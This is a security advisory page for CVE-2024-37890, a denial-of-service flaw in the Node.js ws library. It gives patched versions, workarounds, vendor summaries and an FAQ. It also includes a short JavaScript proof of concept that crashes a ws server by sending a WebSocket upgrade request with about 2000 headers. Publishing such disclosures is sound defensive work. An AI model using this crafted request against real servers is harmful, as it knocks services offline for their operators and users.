CVE-2024-37890: Denial of service when handling a request with many HTTP headers in ws

Published Jun 17, 2024
·
Updated

Impact

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

Proof of concept

js const http = require('http'); const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'+-.0123456789abcdefghijklmnopqrstuvwxyz^|~".split(''); const headers = {}; let count = 0;

for (let i = 0; i < chars.length; i++) { if (count === 2000) break;

for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x';

if (++count === 2000) break; } }

headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13';

const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port });

request.end(); });

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

- https://github.com/websockets/ws/issues/2230 - https://github.com/websockets/ws/pull/2231

[--max-http-header-size=size]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [maxHeaderSize]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [server.maxHeadersCount]: https://nodejs.org/api/http.html#servermaxheaderscount

Other sources

Denial of service when handling a request with many HTTP headers in ws

Microsoft

Node.js ws module is vulnerable to a denial of service, caused by a NULL pointer dereference. By sending a specially crafted request with multiple HTTP headers, a remote attacker could exploit this vulnerability to cause the server to crash.

IBM

ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws.1 (e55e510) and backported to ws.10 (22c2876), ws.3 (eeb76d3), and ws.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63 https://github.com/websockets/ws/issues/2230 https://github.com/websockets/ws/pull/2231 https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q https://nodejs.org/api/http.html#servermaxheaderscount

Red Hat

ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.

NVD

Affected Software

12 affected componentsFixes available
npm/ws>=8.0.0<8.17.1
8.17.1
npm/ws>=7.0.0<7.5.10
7.5.10
npm/ws>=6.0.0<6.2.3
6.2.3
npm/ws>=2.1.0<5.2.4
5.2.4
IBM Planning Analytics<=2.1
IBM Planning Analytics<=2.0
redhat/ws<5.2.4
5.2.4
redhat/ws<6.2.3
6.2.3
redhat/ws<7.5.10
7.5.10
redhat/ws<8.17.1
8.17.1
Microsoft cbl2 reaper 3.1.1-10
Patch available
Microsoft cbl2 reaper 3.1.1-18
Patch available

Event History

Jun 17, 2024
CVE Published
via MITRE·07:09 PM
Data Sourced
via MITRE·07:09 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·07:09 PM
Data Sourced
via NVD·08:15 PM
DescriptionSeverityWeakness
Data Sourced
via Red Hat·09:43 PM
DescriptionSeverityAffected Software
Jul 13, 2024
Data Sourced
via Microsoft·07:00 AM
DescriptionSeverityWeakness
Data Sourced
via Microsoft·07:00 AM
Affected Software
Updated
via Microsoft·07:00 AM
DescriptionSeverity

Parent advisories

This vulnerability appears in the following advisories.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2024-37890?

CVE-2024-37890 has a high severity rating due to its potential to crash WebSocket servers.

2

How do I fix CVE-2024-37890?

To fix CVE-2024-37890, upgrade to ws version 8.17.1, 7.5.10, 6.2.3, or 5.2.4.

3

Which versions are affected by CVE-2024-37890?

CVE-2024-37890 affects ws versions from 8.0.0 to 8.17.1, 7.0.0 to 7.5.10, 6.0.0 to 6.2.3, and 2.1.0 to 5.2.4.

4

Can CVE-2024-37890 be exploited remotely?

Yes, CVE-2024-37890 can be exploited remotely by sending a specially crafted request to a vulnerable WebSocket server.

5

What systems are impacted by CVE-2024-37890?

CVE-2024-37890 impacts systems running the ws package in versions prior to the specified fixes.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203